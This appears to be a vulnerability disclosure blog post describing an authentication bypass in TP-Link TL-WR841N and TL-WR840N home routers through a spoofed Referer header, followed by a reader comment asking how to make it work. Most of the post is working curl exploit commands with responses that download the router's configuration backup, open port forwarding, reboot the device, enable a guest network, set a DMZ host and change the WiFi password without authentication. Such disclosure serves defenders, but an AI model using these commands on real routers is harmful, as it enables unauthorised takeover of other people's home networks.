Hello Folks,
We are BlackFog Team, some days before one of our team member found a very interesting bug in TP-Links Wifi Home Routers which gives full permission on a router without login to the router’s admin panel. In short, we can Bypass the Authentication Mechanism just using a simple trick.
TP-Link is the world’s #1 provider of consumer WiFi networking devices, shipping products to over 120 countries and hundreds of millions of customers. (source https://www.tp-link.com/)
Hardware: TL-WR841N v13 00000013
Firmware Version: 0.9.1 4.16 v0001.0 Build 170622 Rel.64334n
Hardware: TL-WR840N v5 00000005
Firmware Version: 0.9.1 3.16 v0001.0 Build 170608 Rel.58696n
This issue is caused by improper session handling on /cgi/ Folder or /cgi file, This bug found by Touhid Shaikh. if an attacker sends Referer Header with its request and sets Referer: http://192.168.0.1/mainFrame.htm than its no authentication required and an attacker can do router’s action without authentication. below are some of few examples you can see. But the attacker can do mostly all of the action on a router without Authentication.
NOTE: Except admin’s password change because of its required current password for changing.
In This PoC our Team try to download router’s Backup file which contains all setting information within BIN extension file format.
Below we show FAIL and the SUCCESSFUL attempt which tried by our team.
—————————————- FAIL ———————————-
root@linux:/workspace# curl -i -s -k -X GET http://192.168.0.1/cgi/conf.bin
HTTP/1.1 403 Forbidden
Content-Type: text/html; charset=utf-8
Content-Length: 106
Connection: close
<html><head><title>403 Forbidden</title></head><body><center><h1>403
Forbidden</h1></center></body></html>
————————————————————————————-
———————————– SUCCESSFUL —————————-
root@linux:/workspace# curl -i -s -k -X GET -H “Referer: http://192.168.0.1/mainFrame.htm” http://192.168.0.1/cgi/conf.bin
HTTP/1.1 200 OK
Content-Type: application/octet-stream; charset=utf-8
Content-Length: 5984
Connection: keep-alive
root@linux:/workspace# curl -s -k -X GET -H “Referer: http://192.168.0.1/mainFrame.htm” http://192.168.0.1/cgi/conf.bin > backup.bin
root@linux:/workspace# file backup.bin
backup.bin: data
root@linux:/workspace# ls -la backup.bin
-rw-r–r– 1 root root 5720 Mar 30 17:17 backup.bin
—————————————————————
After successfully download Backup file our team try to do more action on the router. Using above PoC trick,
Below we successfully manage and do some action on a router.
=========== Add Port Forwarding ============
curl -i -s -k -X POST -H "Host: 192.168.0.1" -H "User-Agent:Mozilla/Agent22" -H 'Accept: */*' -H "Referer:http://192.168.0.1/mainFrame.htm" --data-binary $'[IP_CONN_PORTTRIGGERING#0,0,0,0,0,0#1,1,2,0,0,0]0,5\x0d\x0atriggerPort=23\x0d\x0atriggerProtocol=TCP or UDP\x0d\x0aopenProtocol=TCP or UDP\x0d\x0aenable=1\x0d\x0aopenPort=23\x0d\x0a' http://192.168.0.1/cgi?3 HTTP/1.1 200 OK Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive [1,1,2,7,0,0]0 triggerPort=23 triggerProtocol=TCP or UDP openProtocol=TCP or UDP enable=1 openPort=23 [error]0
—– Decription —–
enable=0 is for disable
enable=1 is for enable
u can change port also.
====================================
=============== Reboot Router =====================
curl -i -s -k -X POST -H "Host: 192.168.0.1" -H "User-Agent:Mozilla/Agent22" -H 'Accept: */*' -H "Referer:http://192.168.0.1/mainFrame.htm" --data-binary $'[ACT_REBOOT#0,0,0,0,0,0#0,0,0,0,0,0]0,0\x0d\x0a' http://192.168.0.1/cgi?7 HTTP/1.1 200 OK Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive [error]0
—-Description —–
error = 0 means reboot seccessully
======================================
============= Enable Guest Network =====================
curl -i -s -k -X $'POST' -H $'Host: 192.168.0.1' -H $'User-Agent: Aent22' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: text/plain' -H $'Referer: http://192.168.0.1/mainFrame.htm' -H $'Content-Length: 844' -H $'Connection: close' --data-binary $'[LAN_WLAN_MULTISSID#1,1,0,0,0,0#0,0,0,0,0,0]0,1\x0d\x0amultiSSIDEnable=1\x0d\x0a[LAN_WLAN_MSSIDENTRY#1,1,1,0,0,0#0,0,0,0,0,0]1,11\x0d\x0aIsolateClients=0\x0d\x0aEnable=1\x0d\x0aSSID=Agent22\x0d\x0aBeaconType=WPAand11i\x0d\x0aWPAAuthenticationMode=PSKAuthentication\x0d\x0aWPAEncryptionModes=TKIPandAESEncryption\x0d\x0aIEEE11iAuthenticationMode=PSKAuthentication\x0d\x0aIEEE11iEncryptionModes=TKIPandAESEncryption\x0d\x0aPreSharedKey=9876543210\x0d\x0aGroupKeyUpdateInterval=0\x0d\x0aMaxStaNum=32\x0d\x0a[LAN_WLAN_MSSIDENTRY#1,2,1,0,0,0#0,0,0,0,0,0]2,1\x0d\x0aIsolateClients=0\x0d\x0a[LAN_WLAN_GUESTNET#1,1,0,0,0,0#0,0,0,0,0,0]3,8\x0d\x0aLANAccessEnable=1\x0d\x0aUSBAccessEnable=0\x0d\x0aTCEnable=0\x0d\x0aTCMinUpBW=100\x0d\x0aTCMaxUpBW=200\x0d\x0aTCMinDownBW=100\x0d\x0aTCMaxDownBW=200\x0d\x0alastModified=1\x0d\x0a[LAN_WLAN_GUESTNET#1,2,0,0,0,0#0,0,0,0,0,0]4,8\x0d\x0aLANAccessEnable=1\x0d\x0aUSBAccessEnable=0\x0d\x0aTCEnable=0\x0d\x0aTCMinUpBW=100\x0d\x0aTCMaxUpBW=200\x0d\x0aTCMinDownBW=100\x0d\x0aTCMaxDownBW=200\x0d\x0alastModified=0\x0d\x0a' $'http://192.168.0.1/cgi?2&2&2&2&2'
——- Description ———-
SSID=Agent22
PreSharedKey=9876543210
=============================================
======= DMZ enable and Disable on 192.168.0.112 ===========
curl -i -s -k -X $'POST' -H $'Host: 192.168.0.1' -H $'User-Agent: Agent22' -H $'Referer: http://192.168.0.1/mainFrame.htm' -H $'Content-Length: 78' -H $'Connection: close' --data-binary $'[DMZ_HOST_CFG#0,0,0,0,0,0#0,0,0,0,0,0]0,2\x0d\x0aenable=1\x0d\x0aIPAddress=192.168.0.112\x0d\x0a' $'http://192.168.0.1/cgi?2' HTTP/1.1 200 OK Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close [error]0
——-Description ———–
IPAddress=192.168.0.112
enable=1 or 0 (enable or disable)
=================================================
=============== WiFi Password Change =============
curl -i -s -k -X $'POST' -H $'Host: 192.168.0.1' -H $'User-Agent: Agent22' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: text/plain' -H $'Referer: http://192.168.0.1/mainFrame.htm' -H $'Content-Length: 199' -H $'Connection: close' --data-binary $'[LAN_WLAN#1,1,0,0,0,0#0,0,0,0,0,0]0,5\x0d\x0aBeaconType=11i\x0d\x0aIEEE11iAuthenticationMode=PSKAuthentication\x0d\x0aIEEE11iEncryptionModes=AESEncryption\x0d\x0aX_TP_PreSharedKey=9876543210\x0d\x0aX_TP_GroupKeyUpdateInterval=0\x0d\x0a' $'http://192.168.0.1/cgi?2'
——-Description ———–
IEEE11iAuthenticationMode=PSKAuthentication
IEEE11iEncryptionModes=AESEncryption
X_TP_PreSharedKey=9876543210
===============================
Update most latest Firmware today. 😉
30 Mar, 2018 —– Initial Report (support.in@tp-link.com) (No Response)
27 May, 2018 —– Full Disclosure (Exploit-DB)
Don’t use our PoC for Evil activity. we are not responsible for any Damage and we are not support any malicious activity.
Thank you for reading.
1 Comment
Hi, I tried this above, and had following response :
HTTP/1.1 200 OK
Server: Router Webserver
Connection: close
Content-Type: application/octet-stream
WWW-Authenticate: Basic realm=”TP-LINK Wireless N Router WR841N”
window.parent.document.cookie=”Authorization=;path=/”;
window.parent.location.href = “http://192.168.0.1”;
Is it successfull or not ? Because the conf file is empty. What can I do to succeed ? Thanks